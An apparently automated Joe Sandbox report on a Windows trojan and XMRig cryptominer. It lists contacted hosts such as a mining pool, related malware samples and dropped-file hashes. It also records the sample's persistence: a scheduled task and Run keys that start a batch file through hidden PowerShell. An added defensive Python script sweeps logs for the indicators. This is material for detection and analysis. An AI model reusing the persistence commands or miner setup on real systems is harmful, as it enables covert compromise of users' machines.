https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log? | svchost.exe, 00000000.00000002.1367814340.0000010D91A62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1365478065.0000010D91A61000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://schemas.microsoft6#ZQ | powershell.exe, 00000038.00000002.1931658908.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r= | svchost.exe, 00000000.00000003.1366170165.0000010D91A39000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://xmrig.com/wizard | conhost.exe, 0000001D.00000003.1512941310.0000012BFEB19000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1503362780.0000012BFEB14000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1516296200.0000012BFEB11000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1491167267.0000012BFEB12000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1504370851.0000012BFEB1A000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1485004069.0000012BFEB18000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1493388447.0000012BFEB1C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1515362432.0000012BFEB10000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1500353828.0000012BFEB1F000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1489451873.0000012BFEB13000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1507696835.0000012BFEB1D000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1508918553.0000012BFEB16000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1517174227.0000012BFEB1C000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://ecn.dev.virtualearth.net/REST/V1/MapControlConfiguration/native/ | svchost.exe, 00000000.00000003.1263372120.0000010D91A36000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://dev.virtualearth.net/REST/v1/Locations | svchost.exe, 00000000.00000003.1365846529.0000010D91A58000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://dev.ditu.live.com/REST/V1/MapControlConfiguration/native/ | svchost.exe, 00000000.00000002.1367814340.0000010D91A62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1365478065.0000010D91A61000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://dev.virtualearth.net/mapcontrol/logging.ashx | svchost.exe, 00000000.00000003.1365846529.0000010D91A58000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://github.com/Pester/Pester | powershell.exe, 00000042.00000002.2281986100.000001DE9969C000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://dev.ditu.live.com/mapcontrol/logging.ashx | svchost.exe, 00000000.00000003.1365846529.0000010D91A58000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://dev.ditu.live.com/REST/v1/Imagery/Copyright/ | svchost.exe, 00000000.00000003.1365285438.0000010D91A6E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1367511378.0000010D91A42000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1367901976.0000010D91A70000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1366308274.0000010D91A65000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1365478065.0000010D91A61000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1366072429.0000010D91A41000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1365846529.0000010D91A58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1365970028.0000010D91A59000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r= | svchost.exe, 00000000.00000002.1367386845.0000010D91A2B000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r= | svchost.exe, 00000000.00000003.1366072429.0000010D91A41000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://dev.virtualearth.net/REST/v1/Transit/Schedules/ | svchost.exe, 00000000.00000002.1367511378.0000010D91A42000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1366072429.0000010D91A41000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://dynamic.t | svchost.exe, 00000000.00000003.1365253867.0000010D91A50000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://dev.virtualearth.net/REST/v1/Routes/Transit | svchost.exe, 00000000.00000003.1365846529.0000010D91A58000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen | svchost.exe, 00000000.00000003.1365846529.0000010D91A58000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://xmrig.com/docs/algorithms | conhost.exe, 0000001D.00000003.1512941310.0000012BFEB19000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1503362780.0000012BFEB14000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1516296200.0000012BFEB11000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1491167267.0000012BFEB12000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1504370851.0000012BFEB1A000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1485004069.0000012BFEB18000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1493388447.0000012BFEB1C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1515362432.0000012BFEB10000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1500353828.0000012BFEB1F000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1489451873.0000012BFEB13000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1507696835.0000012BFEB1D000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1508918553.0000012BFEB16000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1517174227.0000012BFEB1C000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://tiles.virtualearth.net/tiles/cmd/StreetSideBubbleMetaData?north= | svchost.exe, 00000000.00000002.1367814340.0000010D91A62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1365478065.0000010D91A61000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://xmrig.com/benchmark/%s | conhost.exe, 0000001D.00000003.1512941310.0000012BFEB19000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1503362780.0000012BFEB14000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1516296200.0000012BFEB11000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1491167267.0000012BFEB12000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1504370851.0000012BFEB1A000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1485004069.0000012BFEB18000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1493388447.0000012BFEB1C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1515362432.0000012BFEB10000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1500353828.0000012BFEB1F000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1489451873.0000012BFEB13000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1507696835.0000012BFEB1D000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1508918553.0000012BFEB16000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1517174227.0000012BFEB1C000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://aka.ms/pscore68 | powershell.exe, 00000039.00000002.2283061146.0000022F420B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000040.00000002.2287502418.0000019C5BE51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000042.00000002.2281986100.000001DE99471000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r= | svchost.exe, 00000000.00000002.1367814340.0000010D91A62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1365478065.0000010D91A61000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | conhost.exe, 00000014.00000002.1399936831.00000113DCE61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000039.00000002.2283061146.0000022F420B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000040.00000002.2287502418.0000019C5BE51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000042.00000002.2281986100.000001DE99471000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.bingmapsportal.com | svchost.exe, 00000000.00000002.1367337795.0000010D91A13000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://dev.ditu.live.com/REST/v1/Locations | svchost.exe, 00000000.00000003.1365846529.0000010D91A58000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://dev.virtualearth.net/REST/v1/Imagery/Copyright/ | svchost.exe, 00000000.00000003.1366308274.0000010D91A65000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1367386845.0000010D91A2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1365478065.0000010D91A61000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1365846529.0000010D91A58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1365970028.0000010D91A59000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/ | svchost.exe, 00000000.00000003.1365415952.0000010D91A67000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1367850519.0000010D91A68000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1367386845.0000010D91A2B000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://schemas.microsoft | powershell.exe, 00000038.00000002.1931071513.0000000002DC1000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000003D.00000002.1992736988.0000000003357000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000041.00000002.1997379038.0000000003807000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/ | svchost.exe, 00000000.00000003.1365285438.0000010D91A6E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1367901976.0000010D91A70000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r= | svchost.exe, 00000000.00000003.1365253867.0000010D91A50000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
45.76.89.70 | pool.hashvault.pro | United States | 20473 | AS-CHOOPAUS | true
147.185.221.22 | unknown | United States | 12087 | SALSGIVERUS | true
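A sweep for the two contacted hosts in the table above, as an added example that is not part of the Joe Sandbox report. It matches Zeek-style conn.log records against the report's IP and domain indicators and, separately, counts how many distinct destination ports each external IP was contacted on, since a miner that cycles through several pool ports on one host stands out that way even before the pool address is known. The log records, the DNS answers, the port threshold and all function names are this script's own constructed assumptions.

```python
"""IOC sweep for the contacted hosts listed in the report (added example)."""
from collections import defaultdict

# Indicators copied from the report's IP/domain table.
IOC_IPS = {"45.76.89.70", "147.185.221.22"}
IOC_DOMAINS = {"pool.hashvault.pro"}
MANY_PORTS = 3  # assumption: >= 3 distinct ports to one IP is worth a look

# Constructed conn records, tab-separated: ts, src, dst, dport, proto.
# Benign destinations use RFC 5737 documentation addresses.
SAMPLE_CONN_LOG = """\
1728339843.1\t10.0.0.5\t45.76.89.70\t80\ttcp
1728339843.4\t10.0.0.5\t45.76.89.70\t443\ttcp
1728339843.9\t10.0.0.5\t45.76.89.70\t3333\ttcp
1728339844.2\t10.0.0.5\t45.76.89.70\t5555\ttcp
1728339850.0\t10.0.0.5\t147.185.221.22\t443\ttcp
1728339851.0\t10.0.0.5\t198.51.100.7\t443\ttcp
1728339852.0\t10.0.0.5\t203.0.113.9\t443\ttcp
"""

# Constructed resolver log: (query name, answer).
SAMPLE_DNS_LOG = [
    ("pool.hashvault.pro", "45.76.89.70"),
    ("www.example.net", "203.0.113.9"),
]


def parse_conn(text):
    """Yield (dst, dport) from tab-separated conn records, skipping blank lines."""
    for line in text.splitlines():
        if not line.strip():
            continue
        _ts, _src, dst, dport, _proto = line.split("\t")
        yield dst, int(dport)


def ioc_hits(conn_text, dns_pairs):
    """Return the sorted indicators seen in connection and DNS evidence."""
    hits = set()
    for dst, _ in parse_conn(conn_text):
        if dst in IOC_IPS:
            hits.add(dst)
    for qname, answer in dns_pairs:
        # A query for the pool name, or any name resolving to a listed IP, counts.
        if qname in IOC_DOMAINS or answer in IOC_IPS:
            hits.add(qname)
    return sorted(hits)


def many_ports(conn_text, threshold=MANY_PORTS):
    """Map each dst IP contacted on >= threshold distinct ports to its sorted ports."""
    ports = defaultdict(set)
    for dst, dport in parse_conn(conn_text):
        ports[dst].add(dport)
    return {ip: sorted(p) for ip, p in ports.items() if len(p) >= threshold}


if __name__ == "__main__":
    print("IOC hits:", ioc_hits(SAMPLE_CONN_LOG, SAMPLE_DNS_LOG))
    print("Many ports:", many_ports(SAMPLE_CONN_LOG))
```

The port-fan-out check is deliberately independent of the IOC list: once the pool moves to a new address, the IOC match goes stale but a workstation opening four ports on one external host in under a second still surfaces.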
                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                            Analysis ID:1528504
                                                                                            Start date and time:2024-10-08 00:23:01 +02:00
                                                                                            Joe Sandbox product:CloudBasic
                                                                                            Overall analysis duration:0h 13m 13s
                                                                                            Hypervisor based Inspection enabled:false
                                                                                            Report type:full
                                                                                            Cookbook file name:default.jbs
                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                            Number of analysed new started processes analysed:102
                                                                                            Number of new started drivers analysed:0
                                                                                            Number of existing processes analysed:0
                                                                                            Number of existing drivers analysed:0
                                                                                            Number of injected processes analysed:2
                                                                                            Technologies:
                                                                                            • HCA enabled
                                                                                            • EGA enabled
                                                                                            • AMSI enabled
                                                                                            Analysis Mode:default
                                                                                            Analysis stop reason:Timeout
                                                                                            Sample name:e7WMhx18XN.exe
                                                                                            renamed because original name is a hash value
                                                                                            Original Sample Name:38be83afea1e906c05e5b851253cbc6a.exe
                                                                                            Detection:MAL
                                                                                            Classification:mal100.troj.spyw.expl.evad.mine.winEXE@157/47@1/2
                                                                                            EGA Information:
                                                                                            • Successful, ratio: 34.6%
                                                                                            HCA Information:
                                                                                            • Successful, ratio: 99%
                                                                                            • Number of executed functions: 108
                                                                                            • Number of non-executed functions: 130
                                                                                            Cookbook Comments:
                                                                                            • Found application associated with file extension: .exe
                                                                                            • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, SIHClient.exe, svchost.exe
                                                                                            • Excluded IPs from analysis (whitelisted): 20.42.73.29
                                                                                            • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target cmd.exe, PID 5900 because there are no executed functions
• Execution Graph export aborted for target cmd.exe, PID 6024 because there are no executed functions
• Execution Graph export aborted for target conhost.exe, PID 2660 because there are no executed functions
• Execution Graph export aborted for target conhost.exe, PID 2712 because there are no executed functions
• Execution Graph export aborted for target conhost.exe, PID 3108 because there are no executed functions
• Execution Graph export aborted for target conhost.exe, PID 3128 because there are no executed functions
• Execution Graph export aborted for target conhost.exe, PID 3332 because there are no executed functions
• Execution Graph export aborted for target conhost.exe, PID 3480 because there are no executed functions
• Execution Graph export aborted for target conhost.exe, PID 5304 because there are no executed functions
• Execution Graph export aborted for target conhost.exe, PID 6168 because there are no executed functions
• Execution Graph export aborted for target conhost.exe, PID 6320 because there are no executed functions
• Execution Graph export aborted for target conhost.exe, PID 7352 because there are no executed functions
• Execution Graph export aborted for target dllhost.exe, PID 5880 because there are no executed functions
• Execution Graph export aborted for target e7WMhx18XN.exe, PID 7728 because it is empty
• Execution Graph export aborted for target lsass.exe, PID 628 because there are no executed functions
• Execution Graph export aborted for target powershell.exe, PID 6668 because there are no executed functions
• Execution Graph export aborted for target winlogon.exe, PID 552 because there are no executed functions
• Not all processes were analyzed, report is missing behavior information
                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                            • Report size getting too big, too many NtCreateKey calls found.
                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                            • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                            • VT rate limit hit for: e7WMhx18XN.exe
Time | Type | Description
00:24:03 | Task Scheduler | Run new task: services64 path: C:\Users\user\AppData\Local\Temp\services64.exe
00:25:05 | Task Scheduler | Run new task: $rbx-tXbF0u58 path: cmd.exe s>/C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
00:25:05 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run $rbx-XVR cmd.exe /c echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
00:25:14 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run $rbx-XVR cmd.exe /c echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
18:23:57 | API Interceptor | 5x Sleep call for process: WMIC.exe modified
18:24:02 | API Interceptor | 489x Sleep call for process: conhost.exe modified
18:24:14 | API Interceptor | 113673x Sleep call for process: powershell.exe modified
18:24:18 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
18:24:53 | API Interceptor | 1x Sleep call for process: MpCmdRun.exe modified
18:25:58 | API Interceptor | 131x Sleep call for process: winlogon.exe modified
18:26:05 | API Interceptor | 47x Sleep call for process: lsass.exe modified
18:26:10 | API Interceptor | 1x Sleep call for process: cmd.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
45.76.89.70 | GcqJPBLD2Q.exe | Get hash | malicious | BitCoin Miner, SilentXMRMiner, UACMe, Xmrig | Browse |
 | file.exe | Get hash | malicious | Xmrig | Browse |
 | o9OIGsDt4m.exe | Get hash | malicious | Xmrig | Browse |
 | System.exe | Get hash | malicious | Xmrig | Browse |
 | Update.exe | Get hash | malicious | Blank Grabber, Redline Clipper, Xmrig | Browse |
 | file.exe | Get hash | malicious | Xmrig | Browse |
 | file.exe | Get hash | malicious | Xmrig | Browse |
 | gutpOKDunr.exe | Get hash | malicious | Xmrig | Browse |
 | file.exe | Get hash | malicious | Xmrig | Browse |
 | SecuriteInfo.com.Win64.MalwareX-gen.11857.961.exe | Get hash | malicious | Xmrig | Browse |
147.185.221.22 | SecuriteInfo.com.Trojan.MulDrop28.25270.15094.4444.exe | Get hash | malicious | Njrat | Browse |
 | Bpz46JayQ4.exe | Get hash | malicious | XWorm | Browse |
 | e4L9TXRBhB.exe | Get hash | malicious | XWorm | Browse |
 | BootstrapperV1.19.exe | Get hash | malicious | XWorm | Browse |
 | wSVyC8FY.exe | Get hash | malicious | XWorm | Browse |
 | eFvQTTtxej.exe | Get hash | malicious | Njrat | Browse |
 | SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe | Get hash | malicious | XWorm | Browse |
 | BANK PAYMENT COPY.doc | Get hash | malicious | XWorm | Browse |
 | jQ2ryeS5ZP.exe | Get hash | malicious | PureCrypter, Revenge, CyberGate, DCRat, GuLoader, Njrat, PureLog Stealer | Browse |
 | AutoWizard.exe | Get hash | malicious | Quasar | Browse |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
pool.hashvault.pro | GcqJPBLD2Q.exe | Get hash | malicious | BitCoin Miner, SilentXMRMiner, UACMe, Xmrig | Browse | 45.76.89.70
 | C5Lg2JSPlD.exe | Get hash | malicious | SilentXMRMiner, Xmrig | Browse | 95.179.241.203
 | file.exe | Get hash | malicious | RDPWrap Tool, Amadey, Socks5Systemz, Stealc, Vidar, Xmrig | Browse | 45.76.89.70
 | file.exe | Get hash | malicious | Xmrig | Browse | 45.76.89.70
 | PT54FFSL7ET46RASB.exe | Get hash | malicious | LummaC Stealer, PureLog Stealer, Xmrig, zgRAT | Browse | 142.202.242.43
 | PT54FFSL7ET46RASB.exe | Get hash | malicious | LummaC, PureLog Stealer, Xmrig, zgRAT | Browse | 95.179.241.203
 | o9OIGsDt4m.exe | Get hash | malicious | Xmrig | Browse | 95.179.241.203
 | file.exe | Get hash | malicious | Xmrig | Browse | 95.179.241.203
 | System.exe | Get hash | malicious | Flesh Stealer, Xmrig | Browse | 142.202.242.45
 | System.exe | Get hash | malicious | Xmrig | Browse | 95.179.241.203
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
AS-CHOOPAUS | GcqJPBLD2Q.exe | Get hash | malicious | BitCoin Miner, SilentXMRMiner, UACMe, Xmrig | Browse | 45.76.89.70
 | C5Lg2JSPlD.exe | Get hash | malicious | SilentXMRMiner, Xmrig | Browse | 95.179.241.203
 | na.elf | Get hash | malicious | Mirai | Browse | 66.42.126.39
 | z3hir.x86.elf | Get hash | malicious | Mirai | Browse | 44.172.145.8
 | arm7-20241006-0950.elf | Get hash | malicious | Unknown | Browse | 108.61.212.64
 | 81zBpBAWwc.exe | Get hash | malicious | RHADAMANTHYS | Browse | 155.138.145.67
 | Setup.exe | Get hash | malicious | Unknown | Browse | 45.32.1.23
 | nJohIBtNm5.exe | Get hash | malicious | LummaC, Amadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, RedLine | Browse | 136.244.88.135
 | OXrZ6fj4Hq.exe | Get hash | malicious | Neshta, Oski Stealer, StormKitty, SugarDump, Vidar, XWorm | Browse | 108.61.168.124
 | https://bit.ly/4eqfXtg | Get hash | malicious | Unknown | Browse | 80.240.30.52
SALSGIVERUS | SecuriteInfo.com.Trojan.MulDrop28.25270.15094.4444.exe | Get hash | malicious | Njrat | Browse | 147.185.221.22
 | 1c8DbXc5r0.exe | Get hash | malicious | XWorm | Browse | 147.185.221.18
 | PixpFUv4G7.exe | Get hash | malicious | Quasar, XWorm | Browse | 147.185.221.21
 | H2f8SkAvdV.exe | Get hash | malicious | Blank Grabber, XWorm | Browse | 147.185.221.23
 | A39tzaySzX.exe | Get hash | malicious | AsyncRAT, XWorm | Browse | 147.185.221.23
 | Bpz46JayQ4.exe | Get hash | malicious | XWorm | Browse | 147.185.221.22
 | e4L9TXRBhB.exe | Get hash | malicious | XWorm | Browse | 147.185.221.22
 | H1N45BQJ8x.exe | Get hash | malicious | XWorm | Browse | 147.185.221.23
 | r4RF3TX5Mi.exe | Get hash | malicious | XWorm | Browse | 147.185.221.21
 | BootstrapperV1.19.exe | Get hash | malicious | XWorm | Browse | 147.185.221.22

No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys | GcqJPBLD2Q.exe | Get hash | malicious | BitCoin Miner, SilentXMRMiner, UACMe, Xmrig | Browse |
 | C5Lg2JSPlD.exe | Get hash | malicious | SilentXMRMiner, Xmrig | Browse |
 | TwrhjEKqxk.exe | Get hash | malicious | Xmrig | Browse |
 | aA45th2ixY.exe | Get hash | malicious | Xmrig | Browse |
 | 1mqzOM6eok.exe | Get hash | malicious | Xmrig | Browse |
 | updater.exe | Get hash | malicious | Xmrig | Browse |
 | 7QiAmg58Jk.exe | Get hash | malicious | Metasploit, Meterpreter, Xmrig | Browse |
 | LnK0dS8jcA.exe | Get hash | malicious | Xmrig | Browse |
 | file.exe | Get hash | malicious | Xmrig | Browse |
 | SecuriteInfo.com.Win64.Evo-gen.13032.15171.exe | Get hash | malicious | Xmrig | Browse |
Process: C:\Windows\System32\WerFault.exe
File Type: Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 65536
Entropy (8bit): 1.018985414666619
Encrypted: false
SSDEEP: 96:TY3NF9s0waFqsHh/1yHpHS2QXIDcQOc66cEvcw3mec1+HbHgrZ9n3g4sP8q9sOyR:TwNdwGqw0A+ViUjVkkozuiFLZ24lO89
MD5: ACEFBE921C122BC25639BDD1DA2EEC69
SHA1: 71AC16A8D54DD0B0DB1C9E4D6EF0EC1210CF2837
SHA-256: C4142A259A4EDFC1E4925059CDB2B0E8F194B06F1671B6BF0518476373C1E181
SHA-512: 67082E8E7CF6381A24317486911EBD3D896DC9980B925AF91380F3D105C02E13E969028FE643F2BCC50673838DB6F53C57790C1E14C320AA46A76277EFB0F680
Malicious: false
                                                                                                                                                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.6.4.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.8.1.3.4.4.9.5.8.8.2.7.7.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.2.8.1.3.4.5.0.4.0.0.7.7.8.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.a.f.6.d.0.4.a.-.7.1.b.8.-.4.1.f.8.-.9.0.b.b.-.d.5.b.e.4.9.d.a.4.4.4.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.7.a.a.d.a.b.c.-.b.8.8.a.-.4.e.f.6.-.b.3.3.0.-.b.6.7.b.5.0.3.1.5.8.f.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.c.o.n.h.o.s.t...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.C.O.N.H.O.S.T...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.7.f.c.-.0.0.0.1.-.0.0.1.3.-.7.f.0.d.-.c.c.9.f.0.7.1.9.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.5.2.a.7.2.7.4.a.0.b.4.f.9.4.9.3.6.3.2.0.6.0.f.e.2.5.9.9.3.a.2.e.f.2.4.f.e.8.2.7.!.c.o.n.h.o.s.t...e.x.e.....T.a.r.g.
Process: C:\Windows\System32\WerFault.exe
File Type: Mini DuMP crash report, 15 streams, Mon Oct 7 22:24:09 2024, 0x1205a4 type
Category: dropped
Size (bytes): 329363
Entropy (8bit): 3.1004599593917335
Encrypted: false
SSDEEP: 3072:9KcyQVATdIjk4rp41CCqOft3+v0bTncSSWxjRI3plq5:9KcFshjqOV3Q0rSOIQ
MD5: 0E202745E77F913D572ACE747946E054
SHA1: 3D12335C02BA91C1040C81969156432B7433B2DB
SHA-256: 74912CD91903CBDD01A19CAB139762715C10C9851A99D0C6C861F4B097F9BB52
SHA-512: 2565DCD30CD160C2DDF6B4F677076D60A1023086983BE69A07FB4BF4B11F1DBC2F0FAA4188B19DA5A3BA1A95192361A6C4CBECD82F3C660B2E024F9F6D2CF19D
Malicious: false
                                                                                                                                                        Preview:MDMP..a..... ........_.g....................................P...........t'...f..........`.......8...........T...........x)..............<(..........(*..............................................................................eJ.......*......Lw......................T............_.g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Windows\System32\WerFault.exe
File Type: XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 6616
Entropy (8bit): 3.713694442017744
Encrypted: false
SSDEEP: 192:R6l7wVeJo5MrYALvlypDd89b3ws9f0L9m:R6lXJOAYALvf3wWf1
MD5: 6D9A1AE7A88F86787BB54895EA0E6AA2
SHA1: 065A6740DD617AB961A8F59F1B63C08E713D9B9A
